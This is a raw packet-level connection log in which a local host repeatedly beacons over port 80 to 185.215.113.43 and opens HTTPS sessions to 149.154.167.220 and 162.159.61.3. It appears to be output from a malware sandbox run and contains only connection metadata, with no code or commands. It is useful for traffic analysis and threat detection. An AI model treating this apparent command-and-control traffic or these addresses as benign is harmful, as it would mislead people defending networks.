Nov 21, 2024 22:14:28.474630117 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:29.988934994 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:29.991151094 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:30.108747005 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:30.108819962 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:30.110647917 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:30.110723019 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:30.111016989 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:30.230612040 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:31.492491961 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:31.492657900 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.113435030 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.113455057 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.233045101 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:33.233254910 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:33.233279943 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.233531952 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.233762980 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:33.353321075 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:34.622838974 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:34.622929096 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.129167080 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.129445076 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.251275063 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:36.251365900 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.251538992 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:36.251593113 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.251724005 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:36.371232033 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:37.587023973 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:37.587099075 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.207082033 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.207144976 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.326795101 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:39.327049017 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.327235937 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:39.327332020 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.327333927 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:39.447012901 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:40.716308117 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:40.716413975 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.223524094 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.223941088 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.344403982 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:42.344492912 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.344806910 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:42.344865084 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.346173048 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:42.465724945 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:43.727556944 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:43.727641106 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.347891092 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.347891092 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.467658997 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:45.467755079 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.468044996 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:45.468086958 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.468117952 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:45.587666988 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:46.844578028 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:46.844645977 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.372579098 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.372850895 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.492399931 CET	80	50135	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:48.492444038 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:48.492486000 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.492516994 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.494431019 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:48.614058018 CET	80	50135	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:49.838747025 CET	80	50135	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:49.838855982 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.463041067 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.463388920 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.522443056 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:51.522488117 CET	443	50154	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:51.522830009 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:51.523957968 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:51.523971081 CET	443	50154	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:51.583049059 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:51.583090067 CET	80	50135	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:51.583163023 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.583180904 CET	50135	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.583614111 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:51.703917027 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:52.671880007 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:52.671940088 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:52.672012091 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:52.672235012 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:52.672252893 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:52.939487934 CET	443	50154	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:52.940079927 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.940121889 CET	443	50154	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:52.941181898 CET	443	50154	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:52.941253901 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.942321062 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.942473888 CET	50154	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.946552992 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.946618080 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:52.946902990 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.947309017 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:52.947333097 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:52.963824034 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:52.963892937 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:53.364778042 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.364819050 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.365108967 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.365911007 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.365921974 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.933571100 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.933900118 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.933922052 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.937643051 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.937766075 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.938744068 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.938832998 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:53.938930035 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:53.938937902 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.086743116 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.311109066 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.311650038 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.311687946 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.312763929 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.312844038 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.314083099 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.314255953 CET	443	50159	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.314291000 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.314327955 CET	50159	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.317063093 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.317111015 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.317210913 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.317540884 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:54.317557096 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:54.385727882 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.385831118 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.385879993 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.385927916 CET	50157	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.385946989 CET	443	50157	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.482989073 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:54.483542919 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:54.602838039 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:54.602906942 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:54.603075027 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:54.603154898 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:54.603485107 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:54.683058977 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.683878899 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.683912992 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.685369968 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.685452938 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.685825109 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.685905933 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.685947895 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.722939968 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:54.731338978 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.852555990 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:54.852611065 CET	443	50161	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:54.852854967 CET	50161	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.396851063 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.396903038 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:55.397028923 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.397134066 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.397196054 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:55.397317886 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.397331953 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:55.397340059 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.397566080 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.397583008 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:55.723867893 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.724313021 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.724349976 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.725434065 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.725508928 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.726475954 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.726655006 CET	443	50164	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.726686954 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.726877928 CET	50164	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.729239941 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.729285955 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.729734898 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.730036974 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:55.730055094 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:55.938561916 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:55.939215899 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:56.428235054 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.428273916 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.428364038 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.428520918 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.428554058 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.428603888 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.428889990 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.428913116 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.429038048 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.429052114 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.614027977 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.614279985 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.614300966 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.614759922 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.615135908 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.615242958 CET	443	50167	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.699099064 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.699299097 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.699307919 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.699657917 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.699958086 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.700017929 CET	443	50166	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.737246990 CET	50167	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.789005041 CET	50166	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.138452053 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.142148018 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.142174959 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.144957066 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.145215988 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.146178961 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.146574974 CET	443	50171	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.146610975 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.146714926 CET	50171	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.149189949 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.149245024 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.153575897 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.157275915 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:57.157299042 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:57.573138952 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:57.573719025 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:57.640960932 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.645462036 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.645495892 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.647033930 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.647176027 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.648121119 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.648211956 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.687124014 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.687570095 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.687582970 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.688591003 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.688677073 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.689109087 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.689177036 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.694145918 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:57.694324017 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:57.694494963 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:57.694581985 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:57.694619894 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:57.742474079 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.742500067 CET	443	50172	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.789120913 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.789144993 CET	443	50173	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.814635992 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:57.947258949 CET	50172	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.992177010 CET	50173	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:58.519613981 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:58.520270109 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.520294905 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:58.521368027 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:58.521431923 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.522716999 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.522896051 CET	443	50177	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:58.522933960 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.522953033 CET	50177	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.526433945 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.526467085 CET	443	50179	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:58.526529074 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.527190924 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:58.527213097 CET	443	50179	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:59.083745003 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:59.083811045 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:59.987724066 CET	443	50179	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:59.990004063 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:59.990027905 CET	443	50179	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:59.991163969 CET	443	50179	149.154.167.220	192.168.2.5
Nov 21, 2024 22:14:59.991338968 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:59.992468119 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:59.992468119 CET	50179	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:59.997275114 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:14:59.997324944 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:00.001691103 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:00.005325079 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:00.005351067 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:00.589143991 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:00.589462996 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:00.708950996 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:00.709047079 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:00.709050894 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:00.709100008 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:00.709355116 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:00.828928947 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:01.465262890 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:01.465735912 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.465768099 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:01.468966007 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:01.469130039 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.470228910 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.470415115 CET	443	50180	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:01.470453024 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.470545053 CET	50180	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.473742962 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.473788023 CET	443	50182	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:01.474503994 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.474838018 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:01.474852085 CET	443	50182	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:02.101237059 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:02.102452993 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:02.885976076 CET	443	50182	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:02.886598110 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.886632919 CET	443	50182	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:02.889679909 CET	443	50182	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:02.889750957 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.891371965 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.891444921 CET	50182	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.895201921 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.895246983 CET	443	50185	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:02.895309925 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.895729065 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:02.895744085 CET	443	50185	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:03.729231119 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:03.729247093 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:03.848838091 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:03.849216938 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:03.849356890 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:03.849364042 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:03.849797964 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:03.969299078 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:04.356760979 CET	443	50185	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:04.357171059 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.357182980 CET	443	50185	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:04.358625889 CET	443	50185	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:04.358680964 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.360040903 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.360229969 CET	50185	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.363486052 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.363557100 CET	443	50187	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:04.363640070 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.364119053 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:04.364131927 CET	443	50187	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:05.236306906 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:15:05.239283085 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:15:05.828788042 CET	443	50187	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:05.829365015 CET	50187	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:15:05.829399109 CET	443	50187	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:05.830864906 CET	443	50187	149.154.167.220	192.168.2.5
Nov 21, 2024 22:15:05.830943108 CET	50187	443	192.168.2.5	149.154.167.220
